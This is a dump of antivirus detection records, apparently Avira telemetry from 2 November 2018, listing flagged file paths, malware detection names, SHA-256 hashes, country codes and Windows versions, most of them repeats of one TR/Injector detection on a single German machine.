  Row(detection=Row(filename='avscan-20181102-215041-2011d115', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215041-2011D115', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054246-18d6ea67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054246-18D6EA67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152719-7fe06676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152719-7FE06676', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055603-f3ffa9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055603-F3FFA9E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062344-d1dc22f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062344-D1DC22F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061244-4823f8f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061244-4823F8F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052514-a575f358', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052514-A575F358', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054509-6df4dbd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054509-6DF4DBD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051528-48196308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051528-48196308', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmnt.exe', filepath='\\\\?\\D:\\ninja turtles on USER1 (User1)\\tmnt.exe', filesize=2176000, name='W32/Neshta.A.#M1.#R1'), hash='6928b8f9ce12463e765847b176734a8097b801cb66ecd33ed7507d1a0bd275b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053950-b0037875', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053950-B0037875', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100811-53e3d689', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9134b7cd\\AVSCAN-20181102-100758-510BC81F\\AVSCAN-20181102-100811-53E3D689', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124255-57012513', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124255-57012513', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbprgsetup7.11.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\CDs\\GQ4X-V4 ORIGINAL (D)\\Software\\USBPrgSetup7.11.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='71544e41971ec22c0f2601ce96684a754c9ea046a89107a6fd2eb91340adb3d4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdgenxferfsys.dll', filepath='C:\\Program Files\\Real\\RealPlayer\\Plugins\\pdgenxferfsys.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a98d471a52c6e6ace48ad5037ad7f2afe08881fab43781d2290ef802e58f2c2', metadata=Row(cmdline='--engine=2 --session-id=426QutPPGCzLY5BDwABQ59yjGTKzH8UTm0A+DrPa --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-02T18:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092646-67a80552', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5751850\\AVSCAN-20181102-092633-6517AC87\\AVSCAN-20181102-092646-67A80552', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\65CCA0D7B8D1990217F665A6F68376C406723029E08A6C501A0BC27B41674CC7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='65cca0d7b8d1990217f665a6f68376c406723029e08a6c501a0bc27b41674cc7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055218-6d7fcfa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055218-6D7FCFA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052037-00482c3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052037-00482C3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060557-55a698c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060557-55A698C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060823-acff1e4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060823-ACFF1E4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061817-0f26c5f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061817-0F26C5F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053945-ad029862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053945-AD029862', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054037-cc05c3e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054037-CC05C3E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053033-63a7cffd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053033-63A7CFFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053613-2e7a5536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053613-2E7A5536', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051611-61b4eba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051611-61B4EBA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052702-e5c7a1de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052702-E5C7A1DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c220e6f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C220E6F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055127-4f51ad3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055127-4F51AD3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053543-1c794f0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053543-1C794F0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055533-e1e66aa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055533-E1E66AA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052356-7717d9c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052356-7717D9C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061637-d3835b60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061637-D3835B60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052311-5c8dd50e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052311-5C8DD50E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051003-86a08d52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051003-86A08D52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055322-93f36f02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055322-93F36F02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba4b41db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA4B41DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061642-d5f84cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061642-D5F84CC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060042-99c09da9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060042-99C09DA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061920-349c7edd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061920-349C7EDD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061502-9a94df34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061502-9A94DF34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054727-c047fea0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054727-C047FEA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050623-0376d883', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050623-0376D883', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060119-b054b4fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060119-B054B4FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062120-7bbe28cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062120-7BBE28CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054152-f89166b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054152-F89166B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060633-6b5d2d3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060633-6B5D2D3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053752-696f1b97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053752-696F1B97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054324-2f4517f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054324-2F4517F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:23Z'), dt=datetime.date(2018, 11, 2)),
